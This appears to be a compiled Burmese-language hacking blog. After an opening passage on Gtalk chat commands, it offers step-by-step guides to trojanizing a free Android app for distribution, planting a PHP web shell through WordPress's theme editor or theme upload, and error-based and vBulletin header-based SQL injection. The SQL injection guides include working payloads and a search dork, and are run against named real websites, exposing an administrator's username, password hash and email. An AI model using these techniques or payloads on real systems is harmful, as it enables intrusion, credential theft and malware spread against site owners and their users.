အဲဒီအခါ က်ရင္ သင္က yes လုပ္လိုက္ရုံေပါ့။ သင္ဖန္တီးခဲ့တဲ့ နာမည္ေတြနဲ႔ပဲလာေပၚပါလိမ့္မယ္။ အခုျပထားတာက နမူနာပံုေလးပါ။ ၿပီးရင္ေတာ့ သင့္ Gtalk ထဲမွာ အဲဒီ ဖန္တီးခဲ့တဲ့ နာမည္ေလးက အေရာင္ေလးလင္းေနပါလိမ့္မယ္။ အဲဒီေနာက္မွာေတာ့ သင္ဖိတ္ေခၚခ်င္တဲ့သူေတြကို ဖိတ္ေခၚႏိုင္ပါၿပီ။ အဲလိုဖိတ္ေခၚဖို႔အတြက္လည္း သင္က အခုေပးထားတဲ့ ပံုစံေတြအတိုင္းပဲ ရိုက္ထည့္ရပါလိမ့္မယ္။ /invite name@gmail.com က သင္ ဖိတ္ေခၚခ်င္တဲ့သူအတြက္ပါ။ /list ကေတာ့ သင္နဲ႔အတူ ဘယ္ႏွစ္ေယာက္ရွိလဲဆိုတာ ၾကည့္တာေပါ့။ ျပန္ထြက္ခ်င္ရင္ေတာ့ /exit ရိုက္လို႔လည္းရပါတယ္။ သင္ကလည္း ထြက္သြားၿပီ သူလည္းထြက္သြားၿပီ ေနာက္ေန႔ ေတြ႕ ၾကတဲ့အခါမွာေတာ့ ျပန္လည္ၿပီးေတာ့ /invite name@gmail.com ကို ျပန္လည္ရိုက္ၿပီးေတာ့ ေခၚႏိုင္ပါတယ္။ အဆင္ေျပၾကပါေစ။ ေအာက္မွာေပးထားထာကေတာ့ မူရင္းဆိုဒ္က ရိုက္ပံုရိုက္နည္းေတြပါ။
/leave Leave this chat room. You can rejoin by sending another message to the room. If the room is invite-only, you may need to be re-invited.
/list See who is in the chat room.
/alias newalias Change what name you show up as in the room.
/inviteonly Toggle whether this room is invite only.
/invite someemail Invite someone to the room.
/me someaction Tell the room what you’re up to.
If you type /me is rolling his eyes, everyone sees [youralias] is rolling his eyes.
credit:zawhlainghtun
ref:MHU
၀ိကိလိခ္ ၏ အတြင္းေရးမ်ား ( အပိုင္း ၁ မွ ၇ ) ထိ
၀ိကိလိခ္၏ အတြင္းေရးမ်ား ဆိုတဲ႔ စာအုပ္ကို MCM မွ ကို Giacomo က ဘာသာၿပန္ၿပီး တင္ေပးထားတာၿဖစ္ပါတယ္ ။ ဒီလိုစာအုပ္မ်ိဳးကို ဘာသာၿပန္ၿပီး တင္ေပးဖို႔ဆိုတာ ေတာ္ေတာ္ အားထည့္မွ ရတဲ႔ အလုပ္တစ္ခုပါ ... အခန္း ( ၂၁ ) ခန္းရွိတာ ခုက ( ၁ ) ကေန (၇ ) ထိပါ အခန္း ( ၈ ) ေတာ႔ ၿပီးေနၿပီလို႔ ေၿပာပါတယ္ ။ တင္ထားတာေတာ႔ မေတြ႕မိေသးဘူး... စိတ္၀င္စားဖို႔လည္း ေကာင္းသလို Internet Security နဲ႔ ပက္သက္ၿပီး ကမာကို ကိုင္လွုပ္ခဲ႔တဲ႔ လူေတြ ၿဖစ္လို႔ ပိုၿပီး စိတ္၀င္စားဖို႔ ေကာင္းပါတယ္
Download
http://www.mediafire.com/?y34ckt9u6hvujyq
ref:MHU
Sunday, August 26, 2012
Creating Andriod Trojan in 5 steps
Android Trojan လုပ္ပံုလုပ္နည္းအေၾကာင္းတစ္ေစ့တစ္ေစာင္းေျပာၾကည့္ရေအာင္။ Trojan ဆိုတာကေတာ့ သိတဲ့အတိုင္းပဲ အစဥ္အလာနဲ့ေနလာတာဆိုေတာ့ android os ေပၚလာခ်ိန္မွာသူလဲ တစ္ေခတ္ထေနျပန္ရဲ့။ အဲ့trojan ေတြ ဘယ္လိုဝင္တာဆို တာေတာ့ ကိုယ္ေပးဝင္လို့ ဝင္တာပါပဲ။ ခင္ဗ်ားဖုန္းကို google က ကိစၥအခ်ိဳ့ကို ဖယ္လိုက္လို့ သိပ္မအံၾသပါနဲ့တဲ့။ malicious codeers ေတြက Android အတြက္ Trojan ေတြေရးနုိင္ပါတယ္တဲ့ ။
ကဲထားပါေတာ့ေလ။ဘယ္လိုလုပ္တယ္ဆိုတာေလးပဲေျပာရေအာင္
Technical Director for Security Reponse က Eric Chien က brand-new Trojan တစ္ေကာင္ကို ပရိတ္သတ္ေရွ့မွာရိုးရွင္းေသာနည္းေတြနဲ့ ေရးျပခဲ့ပါတယ္။ စိတ္မပူပါနဲ့ သူ sample app က အဲ့အခန္းထဲ မွာပဲရွိတာပါ။ တနည္းေျပာရင္ ဖ်က္ပစ္လိုက္တယ္ေပါ့။ သူပံုစံအတိုင္းတစ္ျခားေျမာက္မ်ားစြာေသာအေကာင္ေလးေတြပဲ ထြက္လာတာ ။
ကဲ ခု Chien ရဲ့ ရိုးရွင္းတဲ့ငါးခ်က္ကိုေျပာပါ့မယ္။
၁။ free app တစ္ခု download ဆြဲလိုက္ပါ။ လူၾကိဳက္မ်ားတဲ့တစ္ခုဆိုပိုေကာင္းတာေပါ့။
၂။ PC နဲ့ Suit ျဖစ္မယ့္ language compiler တစ္ခုနဲ့ source code ယူ ျပီးရင္ CPU နားလည္တဲ့ assembly language ကိုေျပာင္းလို္က္။ ဒီနည္းလမ္းတစ္လမ္းပဲရွိတယ္ final executable file ကို source code ေျပာင္းဖို့ဆိုတာ။ android app ေတြက Java language နဲ့ေရးထားတာဆိုေတာ့ original source code ကို လြယ္ကူရုိးရွင္းတဲ့ tools ေတြနဲ့ေျပာင္းလို့ရပါတယ္။
၃။ ဒါကေတာ့နဲနဲလက္ဝင္တယ္လို့ေျပာပါတယ္။ သံုးမယ့္ app က user information ေတြကို third party app ေတြ ဆီ ေ၇ာက္ေအာင္ သံုးလုပ္နုိင္မယ့္ app ေတြဆိုပိုေကာင္းမယ္ဗ်ာ။ Chien ကေတာ့ demonstration မွာ Android.Geinimi ကို သံုးသြားပါတယ္။
၄။ Trojan code ထည့္တာကေတာ့ ရိုးရွင္းပါတယ္။ source code ရွိတဲ့ folder ထဲကို ထည့္မယ္ ျပီးရင္ Trojan code ကို တစ္ျခား app ထဲက code ေတြထက္ အရင္ run ေအာင္နဲနဲခ်ိန္းမယ္။ ျပီးရင္ Trojanized app ကို device တစ္ခုလံုး ထိန္းခ်ဳပ္ခြင့္ရေအာင္ permission ေပးမယ္။ ျပီး ရင္ေတာ့ အဲ့ app ကိုနာမည္ခ်ိန္းလိုက္ေပါ့။ “FREE!!!!” လို့ပါရင္ လူတိုင္းၾကိဳက္တယ္မလား။ (ဒါေရးျပီးရင္ ဝယ္ပဲသံုးေတာ့မယ္ app ေတြကို )
၅။ အားလံုးျပီးသြားရင္ ေတာ့ modified app ကို compile လုပ္။ မေျပာင္းလဲ ရွိတဲ့ market ေပၚမွာ တင္လိုက္ေတာ့။ ျပီးရင္ ျပီးျပီ။
အခု လို Trojan မ်ိဳးပါတဲ့ app ကို android Market က လက္မခံပါဘူးတဲ့။ လက္မခံလို့စိတ္မညစ္ပါနဲ့ တရုတ္ ျဖစ္ ေအာင္က်င့္ၾကံလိုက္။ China Market မွာသြားတင္လိုက္။ ကံေကာင္းလို့ ကိုယ္ေရးတတ္ရင္ တရုတ္မလွလွေလးေတြရဲ့ Photo ေလးေတြရမွာေနာ္။ အဲ့ရက်င္ အေနာ္ကို မေမ့နဲ့ေနာ္ ။
အကယ္လို့ tut အကုန္သိခ်င္ပါတယ္ဆိုလို့ရွိရင္ The Hacker News က ထုတ္တဲ့ ၂၀၁၁ နိုဝင္ဘာလထုတ္ မဂၢဇင္းတြင္ Demystifying the Android Malware ဆိုေသာေခါင္းစဥ္ျဖင့္ စာမ်က္နွာ ၁၆ မွာပါရွိပါတယ္။ကၽြန္ေတာ္ အဲ့ tutorial လုပ္ျပီးပါက ျမန္မာလို တင္ေပးပါ့မယ္။ စာဖတ္သူအားလံုး ကိုယ္စိတ္နွစ္ျဖာက်န္းမာခ်မ္းသာၾကပါေစ။
post by Fortran
copy from Ghostarea.net
..:: How to upload shell via Wordpress ::..[2 methods]
Wordpress ထဲကို ကိုယ္ရထားတဲ႔ username / password နဲ႔ login ၀င္ပါ...Dashboard ကိုေရာက္ပါလိမ္႔မယ္...ဘယ္ဘက္နားက appearance ကိုႏွိပ္ပါ...editor ကိုဆက္ႏွိပ္ပါ...Select theme to edit ဆိုျပီး ဒီလိုမ်ိဳးေလးျမင္ရပါလိမ္႔မယ္...ၾကိဳက္ႏွစ္သက္ရာ theme ကုိထားလိုက္ပါ...ကၽြန္ေတာ္ကေတာ႔ url ေခၚရ လြယ္ကူရွင္းလင္းေအာင္ twentyten ကိုပဲထားလိုက္ပါတယ္...select ကို ႏွိပ္ပါ...ပံုေတာ႔နည္းနည္းေသးတယ္....သည္းခံၾကည္႔ဗ်ာ....
ျပီးရင္ ညာဘက္ျခမ္းနားက 404.php / sidebar.php / page.php စသည္ျဖင္႔ php ေတြအမ်ားၾကီး ရွိပါတယ္...ၾကိဳက္ႏွစ္သက္ရာ php တစ္ခုကို click လိုက္ပါ...edit box ထဲမွာ က်လာတဲ႔ သူ႔ရဲ႔ source code ကို shell ရဲ႔ source code နဲ႔လဲျပီး update ကို ႏွိပ္လိုက္ပါ...wordpress ကို shell တင္ျခင္း လုပ္ငန္းျပီးဆံုးပါျပီ....
shell url ကိုေခၚပါမယ္...သူ႔ path က ဒီလိုပါ...
www.site.com/wp-content/themes/themename/shellname.php
ကဲ...shell ၀င္သြားပါျပီဗ်ာ...ဒါပါပဲ...ေနာက္နည္းေတြလည္း ရွိေသးတယ္ဗ်...ဒါေပမယ္႔ ဒါကေတာ႔ အေသခ်ာဆံုးနည္းပဲ...
ေနာက္တစ္နည္း....
ဒီနည္းကို တို႔အစ္ကိုၾကီးတုတ္ေကာက္ ျပထားတာပါ...
http://www.site.com/...eme-install.php ဆိုတဲ႔အဲ path ကိုသြားပါ... upload option ေတြ႔ပါလိမ္႔မယ္...ႏွိပ္ျပီးေတာ႔ ေတြ႔တဲ႔ browse ကေန shell တင္ပါမယ္....
ဒီမွာ မွတ္ထားရမွာက shell ကိုဒီအတိုင္း .php အေနနဲ႔ တင္လို႔မရပါဘူး.... .zip နဲ႔တင္မွရပါမယ္...ဒီေတာ႔ ကိုယ္တို႔ shell က ccc.php ဆိုပါစို႔...... .zip နဲ႔ ခ်ံဳ႔လိုက္ပါမယ္..... ccc.zip ေပါ႔.... အဲဒီ ccc.zip ကို upload လုပ္ပါ.... .rar မဟုတ္ဘူးေနာ္... zip ... ေသခ်ာေျပာတယ္ေနာ္... .zip လို႔....
ိ
တင္လိုက္တာရသြားရင္ ဒီလိုမ်ိဳးစာျပပါလိမ္႔မယ္....
Unpacking the package… Installing the theme… Theme installed successfully.
ဒါဆို shell ရသြားပါျပီ...
မ်ားမ်ားမေျပာဘူး....သူ႔ shell path က ဒီလိုမ်ိဳးေလးျဖစ္ပါမယ္...မေမ႔ခ်င္ရင္ က်က္ထား...
www.site.com/wp-content/themes/ccc/ccc.php
ကၽြန္ေတာ္က 404.zip ကိုတင္လိုက္တယ္....ဒီေတာ႔ ကၽြန္ေတာ္႔ shell path က ဒီလိုျဖစ္သြားတာေပါ႔ဗ်ာ....
http://www.divinginsurance.org/wp-content/themes/404/404.php
copy from MHU
[Tut]Error-Based SQL Injection[/Tut]
Error-Based SQL Injection
Content
1.Introduction
2.About
3.Version စစ္မယ္
4.Database စစ္မယ္
5.Table name ရွာမယ္
6.Column name ရွာမယ္
7.Harvestin Data
8.Conclusion
1.Introduction
ဒီ...Error-based SQL injection အေၾကာင္းကုိဘယ္သူမွစတာမေတြ.ေသးလုိ. ဒီ Thread ေလးကုိဖြင့္ေပးလုိက္ပါတယ္...
မွားတာေတြရွိေနရင္လည္း ၀င္းျပီးေထာက္ျပေဆြေႏြးေပးၾကပါ...
အရင္ဆုံး SQL Injection အေၾကာင္းကုိနဲနဲေလေဖာပါရေစ
SQL Injection ကုိအေျခခံအားျဖင့္ 4မ်ိဳးခဲြျခားလုိ.ရပါတယ္... တခ်ဳိ.ကလည္းသုံးမ်ဳိးလုိ.ေျပာတယ္ ...
1.Blind Based (Also called Boolean)
2.Union Based (အသုံးမ်ားတယ္)
3.Error Based (အခုေျပာမွာ)
4.Double Query (ေနာက္ေျပာမွာ )
နံပါတ္ ၁ ျဖစ္တဲ့ Blind ကေတာ္ေတာ္ပဲခက္ပါတယ္... Guessing Skill နဲ. Experience အမ်ားၾကီးလုိပါတယ္ ...လက္ေရွာင္တာမ်ားတယ္(အေနာ္လည္းတစ္ခါမွ ေအာင္ေအာင္ျမင္္ျမင္မထုိးဘူးေသးဘူး )
Havij Free version မွာလည္းသုံးမရဘူး... Pro version ၀ယ္ႏိုင္ရင္ေကာင္းမယ္ (ကုိေဘာ့စ္ကုိပူဆာ ၾကပါ )
နံပါတ္ ၂ Union ...ကေတာ့အားလုံးလည္းသိျပီးသား ...နာမည္ၾကီးမင္းသား... တစ္တစ္ခါခါ ... Firewall ခံေနတာကလြဲရင္ အသုံးမ်ားတယ္...
နံပါတ္ ၃ Error Based ...အရမ္းကုိေကာင္းတဲ့ Method ပါ... Union အလုပ္မလုပ္ေတာ့ရင္ သူကကယ္တင္ရွင္ပဲ...
နံပါတ္ ၄ Double Q ...သူက Error ရဲ.အဆက္ Query structure ကနာမည္နဲ.လုိက္ေအာင္ေတာ္ေတာ္ရွည္တယ္... သူ.ကုိသုံးရင္ "Bad Request"ဆုိျပီးျပတက္တယ္... သိပ္ေတာ့ၾကိဳက္ဘူး.....
ဒါေတြကအသုံးမ်ားတဲဟာေတြ ... တစ္ျခားအသုံးနည္းတဲ့ MS တုိ. Oracle တုိ. Header Based တုိ.တစ္ပုံၾကီးရွိေသးတယ္...
ကဲကဲေလေဖာတာရပ္ျပီး ....စၾကမယ္ဗ်ာ....
2.About
Error-Based ရဲ. Definition
A method of extracting information from a database when UNION SELECT function does not work at all. This can be done using a compiled query to extract the database information
သူ.ကိုဘယ္လုိအေျခအေနေတြမွာသုံးႏိုင္လဲ ....?
သူ.ကုိ Union သုံးေနရင္နဲ. ေအာက္က Error မ်ဳိးတစ္ခုခုေတြ.လာျပီဆုိသုံးႏုိင္ပါတယ္...
1. The Used Select Statements Have A Different Number Of Columns. 2. Unknown column 1 in order clause. (or 0) 3. Can't find your columns in the page source. 4. Error #1604
ကုိယ္က Union မသုံးခ်င္ဘူးဆုိလည္းသူ.ကိုတန္းသုံးခ်င္လည္းရတယ္...
Demo အေနနဲ.ဒီ site ကုိသုံးျပပါမယ္...
http://www.elansystems.co.za/product-item.php?product_items_id=11
3.Version စစ္မယ္ အရင္ဆုံး Version စစ္ဖုို.သုံးရမယ့္ Query က or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1-- ဒါဆုိျဖစ္လာမယ့္ Url ပုံစံေလးက ... http://www.elansyste...uct_items_id=11 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1-- ရလာမယ့္ Result ကုိအခုလုိ Duplicate Entry ေလးနဲ.ျမင္ရပါမယ္ ...
Quote
Duplicate entry '5.1.63-0+squeeze1:1' for key 'group_key'
4.Database စစ္မယ္
DB Name ကုိသိခ်င္ရင္ သုံးရမယ့္ Query က
and (select 1 from (select count(*),concat((select(select concat(cast(database() as
char),0x7e)) from information_schema.tables where table_schema=database() limit 0,
1),floor(rand(0)*2))x from information_schema.tables group by x)a)
ဒါဆုိျဖစ္လာမယ့္ Url ပုံစံေလးက ...
http://www.elansystems.co.za/product-item.php?product_items_id=11 [color=#ffd700]and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)[/color]
ရလာမယ့္ Result ကုိအခုလုိ Duplicate Entry ေလးနဲ.ျမင္ရပါမယ္ ...
Quote
Duplicate entry 'elansyst_elan~1' for key 'group_key'
ကဲဘယ္လုိလဲ လြယ္လြယ္ေလးပဲမဟုတ္လား...
5.Table name ေတြရွာမယ္
သုံးရမယ့္ Query က...
Quote
and
(select 1 from (select count(*),concat((select(select
concat(cast(table_name as char),0x7e)) from information_schema.tables
where table_schema=database() limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a)
limit 0,1 ဆုိတဲ့ေနရာမွာ 1,1 .... 2,1 ....စသျဖင့္ Table name ေတြတစ္ခုခ်င္းၾကည့္ရမွာပါ...
ဒါဆုိျဖစ္လာမယ့္ Url ပုံစံေလးက ...
http://www.elansystems.co.za/product-item.php?product_items_id=11 and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)ရလာမယ့္ Result ကုိအခုလုိ Duplicate Entry ေလးနဲ.ျမင္ရပါမယ္ ...
Quote
Duplicate entry 'dealer_tbl~1' for key 'group_key'
ဒီေနရာမွာ Table 'wp_users' ကစိတ္၀င္စားဖုိ. တစ္အားေကာင္းေနျပီ
ဒီေတာ့ users ထဲက Columns ေတြကို ႏုွိက္ထုတ္ပါ့မယ္....
6. Column name ေတြရွာမယ္
သုံးရမယ့္ Query က...
Quote
and
(select 1 from (select count(*),concat((select(select
concat(cast(column_name as char),0x7e)) from information_schema.columns
where table_name=0xTABLEHEX limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
ဒီေနရာမွာ ကုိယ္ေျပာင္းရမယ့္ေနရာေတြက ...
1.Limit
2.table_name ကုိHexခံမယ္ (http://www.swingnote...s/texttohex.php)
ဒီလုိနဲ. limit ကုိ ၁ စီတုိးျပီး ... Column name ေတြရပါလိမ့္မယ္...
ဒါဆုိျဖစ္လာမယ့္ Url ပုံစံေလးက ...
http://www.elansystems.co.za/product-item.php?product_items_id=11 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x77705f7573657273 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)ရလာမယ့္ Result ကုိအခုလုိ Duplicate Entry ေလးနဲ.ျမင္ရပါမယ္ ...
Quote
Duplicate entry 'ID~1' for key 'group_key'
cOlumn Name - user_name , user_password , user-email ကိုစိတ္၀င္စားတယ္ဟုတ္?
ok? .....
7.Harvesting Data
ကုိယ့္စိတ္၀င္စားမယ့္ Column name ေတြလည္းရျပီဆုိရင္ Extract လုပ္ပါေတာ့မယ္...
သုံရမယ္ Query ပုံစံက
Quote
and (select 1 from (select count(*),concat((select(select concat(cast(concat(COLUMN_NAME) as char),0x7e)) from Databasename.TABLENAME limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
ကိုယ္ေျပာင္းရမယ့္ေနရာေတြက ...
1.Limit function (count 1 by 1)
2.Databasename (ေစာေစာကတုိ.ထားတဲ့ name ကုိထည့္)
3.TableName (အခုေရာက္ေနတဲ့ table ေပ့ါ)
4.COLUMNNAME (ကို္ယ့္စိတ္၀င္စားတဲ့ COLUMN ေပါ့)
ဒါဆုိျဖစ္လာမယ့္ Url ပုံစံေလးက ...
http://www.elansystems.co.za/product-item.php?product_items_id=11 and (select 1 from (select count(*),concat((select(select concat(cast(concat(user_login) as char),0x7e)) from elansyst_elan.wp_users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)ရလာမယ့္ Result ကုိအခုလုိ Duplicate Entry ေလးနဲ.ျမင္ရပါမယ္ ...
Quote
Duplicate entry 'elan_admin~1' for key 'group_key'
ေနာက္ဆုံးရမယ္အေျဖကုိ ကိုယ့္ပါသာကုိယ္ပဲဆက္ျပီးလုပ္ၾကည့္ပါေတာ့
Quote
elan_admin,$P$BG5yVgzxllpqcLrfwWR9q2TJ8jo8MR0 , darren@elansystems.co.za
8.Conclusion
ဒီေလာက္ဆုိ လြယ္လြယ္ကူကူပဲသေဘာေပါက္မိလိမ့္မယ္ထင္ပါတယ္... ဒီနည္းကအသုံးလည္း၀င္ျပီးလြယ္လည္းလြယ္ကူပါတယ္...
အားနည္းခ်က္ေတြက
၁.Query ရွည္လုိ.အမွားအယြင္းရွိႏုိင္တယ္...
၂.Union မွာ Firewall နဲ.တုိးျပီးဆုိ WAF bypass လုပ္လုိ.ေကာင္းတယ္.. Error ဆုိစိတ္ညစ္ဖုိ.ေကာင္း (အေနာ္လည္းအခုထိလုပ္တက္ေသးဘူး ..လုပ္တက္တဲ့သူမ်ားေအာက္မွာတစ္ခါတည္းေျပာျပၾကပါ ... )
၃.နည္းနည္းလက္၀င္တယ္....
copy from http://mmhackforums.com//index.php?/topic/669-tuterror-based-sql-injectiontut/
[TUT]Vbulletin Forum Hacking with Header-Based SQL injection[TUT]
Injecting Vbulletin Forum
******************
/Content\
****************************
$1.Intro
$2.Tutorial
$3.Conclusion
$1.Intro
Quote
Category : Forum Group Injection
Method : Header-Based SQL injection
Original Exploit :http://www.exploit-i...-sql-injection- vulnerability by D4rkB1t
Software :Vbulletin
Dork :inurl:"search.php?search_type=1"
Vulnerable Version : 4.0.x to 4.1.2
Method : Header-Based SQL injection
Original Exploit :http://www.exploit-i...-sql-injection- vulnerability by D4rkB1t
Software :Vbulletin
Dork :inurl:"search.php?search_type=1"
Vulnerable Version : 4.0.x to 4.1.2
(Ques? ကုိနတ္ဆုိးေရ... အခုေျပာမယ့္ အေၾကာင္းအရာေလးကုိ နဲနဲေလာက္ရွင္းျပပါဦး)
(Ans : ဟုတ္ကဲ့ပါ... ရွင္းပါတယ္.. Vbulletin Forum ေတြကုိ SQL injection ေပါက္တဲ့အေၾကာင္းေလးပါတယ္... ကန္.သတ္ခ်က္ေလးေတြရွိပါတယ္....အေပၚမွာေရထားတဲ့အတုိင္း.... version က 4.0.x ကေန 4.1.2 အတြင္းပဲရမွာ vulnerable ျဖစ္ႏွုန္းက ... နဲနဲနည္းပါတယ္... 50% ၀န္းက်င္ေလာက္ေတာ့ရွိပါတယ္... vbulletin ဆုိေတာ့ Admin login ရွာရတာလြယ္ပါတယ္.... ရလာတဲ့ hash ကုိ ျဖည္ဖုိ.ခက္တာပါ)
MRTV-4 ကေတြ.ဆုံေမးျမန္းတဲ့ စတုိင္ဖမ္းထားတယ္....
(Ques? ဟင္..ခင္ဗ်ားဟာကလည္း... version ကလည္းေအာက္ေသး.... ျဖစ္ႏုိ္င္ေျခကလည္းနည္းေသး... hashed ကလည္းေျဖမရေတာ့... ဘာသြားလုပ္ေတာ့မွာတုန္း...)
(Ans: နည္းပညာေလဗ် နည္းပညာ...
နည္းပညာလုိက္စားသူတုိင္းက တစ္ခုခု...အသစ္သိရတုိင္း...ထမင္းေမ့ဟင္းေမ့ေလ့လာတက္ၾကတယ္... ခင္ဗ်ားနည္းပညာကုိမသိခ်င္ဘူးလား..?)
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$2.Tutorialေတာ္ပါျပီ... ေလပန္းေနတာရပ္ျပီး... စပါေတာ့မယ္... ဒန္တန္.တန္.....
အရင္ဆုံး Live Http headers မရွိသူမ်ား.... အျမန္ဆုံးသြင္းလုိက္ၾကပါ....
goto : broswer >> Alt+T >> A >> Search for addons
ပုံမွန္ဆုိရင္ ... google မွာ dork ထည့္ရွာျပီး... Forum ၀င္ျပီး... ေဖာက္ရမွာပါတယ္... အခုေတာ့ ကြ်န္ေတာ့္ demo ေလးနဲ.ပဲ ...လုပ္ပါေတာ့...
demo site:
Quote
www.myanmarengineer.org
Forum rules ကျမန္မာ website မ်ားမလုပ္ပါနဲ.ဆုိေတာ့... အခုဟာက ... ခဏေလးပဲစမ္းၾကည့္မွာပါ... (Rule လြတ္တယ္ေနာ္ )
password ရလည္းဘာမွလုပ္လုိ.မရပါဘူး ... (သိတဲ့အတုိင္းပဲ.. Vbulletin hash အေၾကာင္းကုိေလ)
အဲဒီ့ေတာ့ vul ျဖစ္တဲ့ေနရာ .... Community ထဲက ... Groups ေနရာမွာပါ....
site ရဲ. ညာဘက္ေထာင့္ဆုံး.... အေပၚနားေလးမွာ ... Advanced Search button ေလးကုိ ႏိွပ္ပါ
ေအာက္ကပုံေလးထဲကုိေရာက္သြားလိမ့္မယ္...
လုပ္ရမယ့္အဆင့္ဆင့္က ... forum မွာ member ၀င္... အုပ္စုထဲကုိသြား...ကုိယ့္ဘာသာ ...အုပ္စုတစ္ခုခုကုိ create လုပ္ ...
ဒါမွမဟုတ္လဲ ... ရွိျပီးသား...တစ္ခုခုကုိ ခဏမွတ္ထားလုိက္ေပါ့...
ဒီအဆင့္ေတြျပီးသြားရင္ ... ေစာေစာက Advanced Search ကုိျပန္သြားပါ ...
ကုိယ္မွတ္ထားတဲ့ Group နာမည္ကုိ search box ထဲထည့္ပါ....
ေစာေစာ Install လုပ္ထားတဲ့ ... Live Http headers add-on ကိုဖြင့္ထားပါ ...
ျပီးရင္ search now ကုိႏိွပ္ပါ...
ေအာက္ကပုံကုိၾကည့္ၾကပါ...
ပုံမွာ highlight လုပ္ထားတဲ့ ... စာသားေလးကုိေတြ.ေအာင္ရွာပါ ...
ျပီးရင္... click လုပ္... ေအာက္က replay button ကုိႏိွပ္....
http://i.imgur.com/lBdsZ.png
အခုလုိ ျမင္ရပါလိမ့္မယ္..
cotent box ထဲက.... စာေတြထဲမွာ ေနာက္ဆုံးက .. Id= ဆုိတာကုိေတြ.တယ္ဟုတ္... အဲဒီ့ မွာ SQL query ေတြပုိ.မွာ...
ေအာက္ကဟာေလးကုိ cp/paste လုပ္ျပီး.... replay button ကုိႏွိပ္ပါ...
&cat[0]=1) union select version#
ဒါဆုိအခုလုိ vesion ျမင္ရမယ္....
ေနာက္ဆုံးအဆင့္ ... usr name ေတြ password ေတြ လုိခ်င္ရင္ေအာက္က query ကုိေစာေစာကအတုိင္းပုိ.လုိက္ေပါ့....
&cat[0]=1 union+select+group_concat(userid,0x3a,username,0x3a,password,0x3a,usergroupid) from user where usergroupid=6#ေအာက္မွာ ၾကည့္ၾကပါ...
ဒီေလာက္ဆုိ... သေဘာေပါက္ေလာက္ပါတယ္... ေနာ္...
အားနည္းခ်က္.... Human Image Verification ... ရိွေနရင္...မရပါ....
ပံုမ်ားမျမင္ရလွ်င္ကလစ္လုပ္ပါ
copy from mhu
Thank to D3vilM4yCry